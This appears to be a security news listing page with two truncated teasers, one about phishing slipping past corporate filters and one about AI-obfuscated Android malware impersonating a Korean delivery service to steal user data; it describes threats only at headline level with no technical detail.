Phishing Breaks More Defenses Than Ever. Here’s the Fix If your tools say a link is clean, do you fully trust it? Most SOC leaders don’t anymore, and for good reason. Phishing has become polished, quiet, and built to blend into everyday traffic. It slips through filters, lands in inboxes unnoticed, and only reveals its intent after a user interacts. By…
-
AI-Based Obfuscated Malicious Apps Evading AV Detection to Deploy Malicious Payload
AI-Based Obfuscated Malicious Apps Evading AV Detection to Deploy Malicious Payload A new wave of malicious Android applications impersonating a well-known Korean delivery service has emerged, featuring advanced obfuscation techniques powered by artificial intelligence. These apps work to bypass traditional antivirus detection methods while extracting sensitive user information. The threat actors behind this campaign have…